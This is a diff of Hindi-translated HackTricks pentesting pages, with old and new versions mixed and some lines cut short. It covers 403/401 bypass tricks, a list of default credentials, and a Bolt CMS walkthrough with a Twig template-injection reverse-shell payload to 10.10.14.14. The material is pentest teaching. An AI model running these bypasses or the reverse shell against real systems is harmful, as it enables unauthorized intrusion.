<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का एक्सेस** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का** अनुसरण करें
* **अपने हैकिंग ट्रिक्स को** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके साझा करें।**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **फॉलो करें**
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details>

126
network-services-pentesting/pentesting-web/403-and-401-bypasses.md
View file

@ -1,37 +1,39 @@
# 403 और 401 बापास
# 403 और 401 बापास
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करने की इच्छा रखते हैं? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें और** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके** करें।
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **फॉलो करें**.
* **अपनी हैकिंग ट्रिक्स साझा करें PRs जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में.
</details>
<figure><img src="../../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>
[**DragonJAR Security Conference es un evento internacional de ciberseguridad**](https://www.dragonjarcon.org/) con más de una década que se celebrará el 7 y 8 de septiembre de 2023 en Bogotá, Colombia. Es un evento de gran contenido técnico donde se presentan las últimas investigaciones en español que atrae a hackers e investigadores de todo el mundo.\
¡Regístrate ahora en el siguiente enlace y no te pierdas esta gran conferencia!:
[**DragonJAR Security Conference एक अंतर्राष्ट्रीय साइबर सुरक्षा इवेंट है**](https://www.dragonjarcon.org/) जो एक दशक से अधिक समय से चल रहा है और 7 और 8 सितंबर 2023 को बोगोटा, कोलंबिया में आयोजित होगा। यह एक उच्च तकनीकी सामग्री वाला इवेंट है जहां स्पेनिश में नवीनतम अनुसंधान प्रस्तुत किए जाते हैं जो दुनिया भर के हैकर्स और शोधकर्ताओं को आकर्षित करता है।
अब निम्नलिखित लिंक पर रजिस्टर करें और इस महान सम्मेलन को मिस न करें!:
{% embed url="https://www.dragonjarcon.org/" %}
## HTTP Verbs/Methods Fuzzing
फ़ाइल तक पहुंचने के लिए **विभिन्न वर्ब** का उपयोग करें: `GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK`
फ़ाइल तक पहुंचने के लिए **विभिन्न verbs का प्रयोग करें**: `GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK`
* प्रतिक्रिया हेडर्स की जांच करें, शायद कुछ जानकारी दी जा सकती है। उदाहरण के लिए, `Content-Length: 55` के साथ **HEAD** के लिए **200 प्रतिक्रिया** का मतलब है कि **HEAD वर्ब सूचना तक पहुंच सकता है**। लेकिन आपको फिर भी उस सूचना को निकालने का एक तरीका ढूंढ़ना होगा।
* `X-HTTP-Method-Override: PUT` जैसा एक HTTP हेडर उपयोग करके वर्ब को अधिलेखित कर सकता है।
* **`TRACE`** वर्ब का उपयोग करें और यदि आप बहुत भाग्यशाली हैं तो शायद प्रतिक्रिया में आप देख सकते हैं कि कौन से **हेडर्स बाध्यता प्रोक्सी द्वारा जोड़े गए** हैं जो उपयोगी हो सकते हैं।
* प्रतिक्रिया हेडर्स की जांच करें, शायद कुछ जानकारी दी जा सकती है। उदाहरण के लिए, **HEAD** के लिए **200 प्रतिक्रिया** `Content-Length: 55` का मतलब है कि **HEAD verb जानकारी तक पहुंच सकता है**। लेकिन आपको उस जानकारी को निकालने का तरीका अभी भी खोजना होगा।
* `X-HTTP-Method-Override: PUT` जैसा HTTP हेडर का उपयोग करके प्रयुक्त verb को ओवरराइट किया जा सकता है।
* **`TRACE`** verb का उपयोग करें और यदि आप बहुत भाग्यशाली हैं तो शायद प्रतिक्रिया में आप बीच के प्रॉक्सी द्वारा जोड़े गए **हेडर्स** भी देख सकते हैं जो उपयोगी हो सकते हैं।
## HTTP Headers Fuzzing
* **Host हेडर को बदलें** और किसी अनुचित मान ([जो यहां काम करता था](https://medium.com/@sechunter/exploiting-admin-panel-like-a-boss-fc2dd2499d31)) का उपयोग करें
* संसाधन तक पहुंच के लिए [**अन्य उपयोगकर्ता एजें**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/User-Agents/UserAgents.fuzz.txt) का प्रयास करें
* **Fuzz HTTP Headers**: HTTP प्रॉक्सी **हेडर्स**, HTTP प्रमाणीकरण बेसिक और NTLM ब्रूट-फोर्स (कुछ कम्बिनेशन के साथ केवल) और अन्य तकनीकों का प्रयास करें। इसके लिए मैंने उपकरण [**fuzzhttpbypass**](https://github.com/carlospolop/fuzzhttpbypass) बनाया है।
* **Host हेडर बदलें** किसी मनमाने मूल्य में ([यहां काम किया](https://medium.com/@sechunter/exploiting-admin-panel-like-a-boss-fc2dd2499d31))
* संसाधन तक पहुंचने के लिए [**अन्य User Agents का उपयोग करें**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/User-Agents/UserAgents.fuzz.txt)
* **HTTP Headers Fuzz करें**: HTTP Proxy **Headers**, HTTP Authentication Basic और NTLM brute-force (कुछ संयोजनों के साथ) और अन्य तकनीकों का प्रयोग करें। इस सब के लिए मैंने [**fuzzhttpbypass**](https://github.com/carlospolop/fuzzhttpbypass) टूल बनाया है।
* `X-Originating-IP: 127.0.0.1`
* `X-Forwarded-For: 127.0.0.1`
@ -47,42 +49,70 @@
* `X-ProxyUser-Ip: 127.0.0.1`
* `Host: localhost`
यदि **पथ संरक्षित है**, तो आप इन अन्य हेडर्स का उपयोग करके पथ संरक्षण को अपेक्षित कर सकते हैं:
यदि **पथ सुरक्षित है** तो आप इन अन्य हेडर्स का उपयोग करके पथ सुरक्षा को बायपास करने का प्रयास कर सकते हैं:
* `X-Original-URL: /admin/console`
* `
* `X-Rewrite-URL: /admin/console`
* यदि पृष्ठ **प्रॉक्सी के पीछे है**, शायद प्रॉक्सी ही आपको निजी जानकारी तक पहुंचने से रोक रही है। [**HTTP Request Smuggling**](../../pentesting-web/http-request-smuggling/) **या** [**hop-by-hop headers**](../../pentesting-web/abusing-hop-by-hop-headers.md) का दुरुपयोग करने का प्रयास करें।
* [**विशेष HTTP हेडर्स**](special-http-headers.md) को Fuzz करें और विभिन्न प्रतिक्रिया की तलाश करें।
* **विशेष HTTP हेडर्स को Fuzz करें** जबकि **HTTP Methods** को Fuzz कर रहे हों।
* **Host हेडर को हटा दें** और शायद आप सुरक्षा को बायपास कर पाएंगे।
## Path **Fuzzing**
यदि _/path_ अवरुद्ध है:
* _**/**_**%2e/path** का प्रयोग करें (यदि पहुंच प्रॉक्सी द्वारा अवरुद्ध है, तो यह सुरक्षा को बायपास कर सकता है)। **/%252e**/path (डबल URL एनकोड) का भी प्रयास करें
* **Unicode बायपास करें**: _/**%ef%bc%8f**path_ (URL एनकोडेड चरित्र "/" की तरह हैं) इसलिए जब वापस एनकोड किया जाएगा तो यह _//path_ होगा और शायद आपने पहले ही _/path_ नाम की जांच को बायपास कर दिया होगा
* **अन्य पथ बायपास**:
* site.com/secret > HTTP 403 Forbidden
* site.com/SECRET > HTTP 200 OK
* site.com/secret/ > HTTP 200 OK
* site.com/secret/. > HTTP 200 OK
* site.com//secret// > HTTP 200 OK
* site.com/./secret/.. > HTTP 200 OK
* site.com/;/secret > HTTP 200 OK
* site.com/.;/secret > HTTP 200 OK
* site.com//;//secret > HTTP 200 OK
* site.com/secret.json > HTTP 200 OK (ruby)
* निम्नलिखित स्थितियों में [**इस सूची**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/Unicode.txt) का पूरा उपयोग करें:
* /FUZZsecret
* /FUZZ/secret
* /secretFUZZ
* **अन्य API बायपास:**
* /v3/users\_data/1234 --> 403 Forbidden
* /v1/users\_data/1234 --> 200 OK
* {“id”:111} --> 401 Unauthorized
* {“id”:\[111]} --> 200 OK
* {“id”:111} --> 401 अनधिकृत
* {“id”:111} --> 401 Unauthorized
* {“id”:{“id”:111\}} --> 200 OK
* {"user\_id":"\<legit\_id>","user\_id":"\<victims\_id>"} (JSON पैरामीटर प्रदूषण)
* user\_id=ATTACKER\_ID\&user\_id=VICTIM\_ID (पैरामीटर प्रदूषण)
* {"user\_id":"\<legit\_id>","user\_id":"\<victims\_id>"} (JSON Parameter Pollution)
* user\_id=ATTACKER\_ID\&user\_id=VICTIM\_ID (Parameter Pollution)
## **पैरामीटर मानिपुलेशन**
## **Parameter Manipulation**
* **पैरामीटर मान** बदलें: **`id=123` --> `id=124`**
* **पैरामीटर मान बदलें**: **`id=123` --> `id=124`**
* URL में अतिरिक्त पैरामीटर जोड़ें: `?`**`id=124` —-> `id=124&isAdmin=true`**
* पैरामीटर हटाएं
* पैरामीटरों को पुनः क्रमबद्ध करें
* विशेष वर्णों का उपयोग करें।
* पैरामीटर में सीमा परीक्षण करें - _-234_ या _0_ या _99999999_ जैसे मान प्रदान करें (कुछ उदाहरण मानों के साथ)।
* पैरामीटर्स को हटा दे
* पैरामीटर्स का क्रम बदलें
* विशेष चरित्रों का उपयोग करें।
* पैरामीटर्स में सीमा परीक्षण करें _-234_ या _0_ या _99999999_ जैसे मान प्रदान करें (कुछ उदाहरण मान)।
## **प्रोटोकॉल संस्करण**
## **Protocol version**
यदि HTTP/1.1 का उपयोग किया जा रहा है, **1.0 का उपयोग करने का प्रयास करें** या यह जांचें कि क्या यह **2.0 का समर्थन करता है**
यदि HTTP/1.1 का उपयोग कर रहे हैं **तो 1.0 का प्रयोग करें** या यहां तक कि जांचें कि क्या यह **2.0 का समर्थन करता है**
## **अन्य बाइपास**
## **अन्य बापास**
* डोमेन का **IP** या **CNAME** प्राप्त करें और इसे सीधे **संपर्क करने का प्रयास करें**
* सामान्य GET अनुरोध भेजकर सर्वर को **तनाव दें** (यह एक व्यक्ति के साथ काम कर गया था Facebook पर)
* **प्रोटोकॉल बदलें**: http से https में या https से http में
* [**https://archive.org/web/**](https://archive.org/web/) पर जाएं और जांचें कि क्या पिछले में उस फ़ाइल को **विश्वव्यापी रूप से पहुंचने योग्य** था।
* डोमेन का **IP** या **CNAME** प्राप्त करें और **सीधे संपर्क करने का प्रयास करें**।
* **सर्वर पर दबाव डालें** सामान्य GET अनुरोध भेजकर ([इस व्यक्ति के लिए Facebook के साथ काम किया](https://medium.com/@amineaboud/story-of-a-weird-vulnerability-i-found-on-facebook-fc0875eb5125))।
* **प्रोटोकॉल बदलें**: http से https में, या https से http में
* [**https://archive.org/web/**](https://archive.org/web/) पर जाएं और जांचें कि क्या अतीत में वह फ़ाइल **विश्वव्यापी सुलभ** थी
## **ब्रूट फ़ोर्स**
## **Brute Force**
* **पासवर्ड को अनुमान लगाएं**: निम्नलिखित सामान्य क्रेडेंशियल का परीक्षण करें। क्या आपके पास पीड़ित के बारे में कुछ जानकारी है? या CTF चैलेंज का नाम?
* [**ब्रूट फ़ोर्स**](../../generic-methodologies-and-resources/brute-force.md#http-brute)**:** मूल, डाइजेस्ट और NTLM प्रमाणीकरण का प्रयास करें।
{% code title="सामान्य क्रेडेंशियल" %}
* **पासवर्ड अनुमान लगाएं**: निम्नलिखित सामान्य क्रेडेंशियल्स का परीक्षण करें। क्या आपको पीड़ित के बारे में कुछ पता है? या CTF चैलेंज का नाम?
* [**Brute force**](../../generic-methodologies-and-resources/brute-force.md#http-brute
```
admin admin
admin password
@ -105,19 +135,21 @@ guest guest
<figure><img src="../../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>
[**DragonJAR सुरक्षा सम्मेलन एक अंतर्राष्ट्रीय साइबर सुरक्षा कार्यक्रम है**](https://www.dragonjarcon.org/), जो कोलंबिया के बोगोटा में 7 और 8 सितंबर 2023 को आयोजित होने वाला है। यह एक तकनीकी सामग्री युक्त घटना है जहां स्पेनिश में नवीनतम शोध प्रस्तुत की जाती है और जो दुनिया भर के हैकर्स और शोधकर्ताओं को आकर्षित करता है।\
इस महान सम्मेलन को न छोड़ें, नीचे दिए गए लिंक पर अभी पंजीकरण करें!:
[**DragonJAR Security Conference एक अंतर्राष्ट्रीय साइबर सुरक्षा इवेंट है**](https://www.dragonjarcon.org/) जो एक दशक से अधिक समय से आयोजित किया जा रहा है और यह 7 और 8 सितंबर 2023 को बोगोटा, कोलंबिया में होगा। यह एक उच्च तकनीकी सामग्री वाला इवेंट है जहां स्पेनिश में नवीनतम अनुसंधान प्रस्तुत किए जाते हैं जो दुनिया भर के हैकर्स और शोधकर्ताओं को आकर्षित करते हैं।\
अभी निम्नलिखित लिंक पर रजिस्टर करें और इस महान सम्मेलन को मिस न करें!:
{% embed url="https://www.dragonjarcon.org/" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो**? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की अनुमति चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का पालन करें।**
* **अपने हैकिंग ट्रिक्स को हमें PR के माध्यम से सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को साझा करें।**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **फॉलो** करें।
* **अपनी हैकिंग ट्रिक्स साझा करें HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details>

46
network-services-pentesting/pentesting-web/bolt-cms.md
View file

@ -1,45 +1,49 @@
# बोल्ट सीएमएस
# Bolt CMS
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी संग्रह**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक पीएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपने हैकिंग ट्रिक्स को** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके साझा करें।**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
</details>
## RCE
व्यवस्थापक के रूप में लॉगिन करने के बाद (लॉगिन प्रॉम्प्ट तक पहुंचने के लिए /bot पर जाएं), आप बोल्ट सीएमएस में RCE प्राप्त कर सकते हैं:
एडमिन के रूप में लॉगिन करने के बाद (लॉगिन प्रॉम्प्ट तक पहुँचने के लिए /bot पर जाएं), आप Bolt CMS में RCE प्राप्त कर सकते हैं:
* `Configuration` -> `View Configuration` -> `Main Configuration` का चयन करें या URL पथ `/bolt/file-edit/config?file=/bolt/config.yaml` पर जाएं
* थीम के मान की जांच करें
* थीम का मान जांचें
<figure><img src="../../.gitbook/assets/image (1) (1) (2) (3).png" alt=""><figcaption></figcaption></figure>
* `File management` -> `View & edit templates` का चयन करें
* पिछले (इस मामले में `base-2021`) चरण में पाए गए थीम बेस का चयन करें और `index.twig` का चयन करें
* मेरे मामले में यह URL पथ में है /bolt/file-edit/themes?file=/base-2021/index.twig
* [टेम्पलेट इंजेक्शन (Twig)](../../pentesting-web/ssti-server-side-template-injection/#twig-php) के माध्यम से इस फ़ाइल में अपने पेलोड सेट करें, जैसे: `{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}`
* और परिवर्तन सहेजें
* पिछले चरण में पाए गए थीम बेस का चयन करें (`base-2021` इस मामले में) और `index.twig` का चयन करें
* मेरे मामले में यह URL पथ /bolt/file-edit/themes?file=/base-2021/index.twig पर है
* इस फाइल में अपना पेलोड [template injection (Twig)](../../pentesting-web/ssti-server-side-template-injection/#twig-php) के माध्यम से सेट करें, जैसे: `{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}`
* और परिवर्तनों को सेव करें
<figure><img src="../../.gitbook/assets/image (3) (7).png" alt=""><figcaption></figcaption></figure>
* `Maintenance` -> `Clear the cache` में कैश साफ करें
* एक सामान्य उपयोगकर्ता के रूप में पुनः पृष्ठ का उपयोग करें, और पेलोड को निष्पादित होना चाहिए
* `Maintenance` -> `Clear the cache` में कैश को साफ करें
* फिर से एक सामान्य उपयोगकर्ता के रूप में पेज को एक्सेस करें, और पेलोड को निष्पादित किया जाना चाहिए
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी संग्रह**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक पीएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपने हैकिंग ट्रिक्स को** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके साझा करें।**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
</details>

439
pentesting-web/content-security-policy-csp-bypass/README.md
View file

@ -1,56 +1,58 @@
# सामग्री सुरक्षा नीति (CSP) बाईपास
# Content Security Policy (CSP) बायपास
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
